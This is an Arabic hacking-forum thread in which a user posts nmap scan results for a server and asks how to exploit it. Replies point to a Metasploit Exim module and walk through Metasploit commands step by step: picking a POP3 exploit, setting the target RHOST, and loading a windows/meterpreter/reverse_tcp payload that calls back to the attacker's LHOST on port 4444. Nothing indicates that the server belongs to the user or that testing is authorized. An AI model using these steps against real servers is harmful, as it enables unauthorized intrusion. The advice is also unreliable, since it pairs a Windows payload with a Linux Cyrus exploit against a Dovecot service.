التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام


قديم 04-27-2012, 11:41 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية scaryhacker
 

 

 
إحصائية العضو







scaryhacker غير متواجد حالياً

إرسال رسالة عبر MSN إلى scaryhacker

 

 

إحصائية الترشيح

عدد النقاط : 10
scaryhacker is on a distinguished road

افتراضي مجاب: بعد فحص السيرفر بــnmap كيف الاستغلال



السلام عليكم
يا شباب انا فحصة سيرفر وهذي النتيجة هل يوجد ثغرة في برامج السيرفر
ويليت طريقة الاستغلال


================================================== ===============

port ______state___ service_______ version
tcp/21_____open_____ ftp__________ Pure-FTPd
tcp/22 ____open____ ssh______ OpenSSH 4.3 (protocol2.0
tcp/25____ open ____smtp _______Exim smtpd 4.77
tcp/53 ____open ____domain____ dns-nsid:bind.version:9.3.6-P1-RedHat-9.3.6-20.P1.e15
tcp/80 ____open ____http ________nginx 0.9.7
tcp/110____open ___pop3 _______ Dovecot pop3d
tcp/143____open___ imap _____ Dovecot imapd
tcp/443____open____ http?______ http-methods

================================================== ===============



Vspan style="font-weight: bold; color: #006400;"Cl[hf:VLspanC fu] tpw hgsdvtv fJJnmap ;dt hghsjyghg

التوقيع



 


التعديل الأخير تم بواسطة scaryhacker ; 04-27-2012 الساعة 11:47 AM.

   

رد مع اقتباس
أفضل جواب - كتبه الشبح المرح
جرب الثغرة دي http://www.metasploit.com/modules/ex..._string_format
ممكن تنجح مع الاصدار 4.77
و هدا فيديو لشرحها
http://www.youtube.com/watch?v=DnSgO...layer_embedded
قديم 04-27-2012, 12:35 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
إحصائية العضو






الشبح المرح غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
الشبح المرح is on a distinguished road

افتراضي رد: بعد فحص السيرفر بــnmap كيف الاستغلال


جرب الثغرة دي http://www.metasploit.com/modules/ex..._string_format
ممكن تنجح مع الاصدار 4.77
و هدا فيديو لشرحها

التوقيع







 

   

رد مع اقتباس
قديم 04-27-2012, 01:44 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية MO3ETH
 

 

 
إحصائية العضو






MO3ETH غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
MO3ETH is on a distinguished road

افتراضي رد: بعد فحص السيرفر بــnmap كيف الاستغلال


السلام عليكم

إختراق المواقع عنطريق البورت ممكن بمشروع المتاسبلويت الموجود بالباك تراك

بس لازم تعرف طريقة الإستغلال وهل البورت الموفتوح به ثغرة أو لا

بالنسبة للبحث عن الثغرات لها مواقعها مثل

http://www.exploit-db.com/search/

يكفي تحط البورت والثغرات التي تريدها مواقع أجهزة ,,, وهو يعطيك أحدث الثغرات

الأن بالنسبة للفحص اللي عامله لاحظة وجود البورت 110 الخاص بمنفذ pop3 مفتوح ويمكن إستغلاله عنطريق المتا سبلويت

استغلالها كالتالي

بعد فتح المتاسبلويت

ضع الامر search pop3

ورح يظهر لك الاستغلالها المتوفرة

اختر الاستغلال بالامر use متبوعا بالاسم او الرابط هكذا

use linux/pop3/cyrus_pop3d_popsubfolders

ثم show options لأظهار الخيارات المتاحة والمطلوبة من قبل المهاجم

عند تنفيذ الامر انظر ما المطلوب فقط لمطلوب الاي بي المستهدف والبورت

البورت اكتشفناه اثناء الفحص انه مفتوح والاي بي هو الاي بي او الموقع الذي تم فحصه واكتشاف انا المنفذ
110 مفتوح

نكمل الاستغلال بعد تحديد الاي بي المراد اختراقه والذي ظهر لنا اثناء الفحص ونقوم بتحديد بالامر

set RHOST xx.xxx.xxx.xxx

xx.xxx.xxx.xxx:أيبي الموقع

ثم نختار البايلود ويفضل تختار الميتربريتر او اي شيء تريده

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST xxx.xxx.xxx اي بي جهاز المهاجم

set LPORT 4444 بورت مفتوح في جهاز المهاجم

ومن ثم امر الاستغلال exploit

يمكن هذه قديمة يوجد افضل منها فقط انت وبحثك

بالتوفيق

   

رد مع اقتباس
قديم 04-27-2012, 03:19 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
vpn_31
Security
 
الصورة الرمزية vpn_31
 

 

 
إحصائية العضو








vpn_31 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
vpn_31 is on a distinguished road

افتراضي رد: بعد فحص السيرفر بــnmap كيف الاستغلال


لأخوان ماقصرو معك

التوقيع

d0nt mess with me ;)

 

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 12:27 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0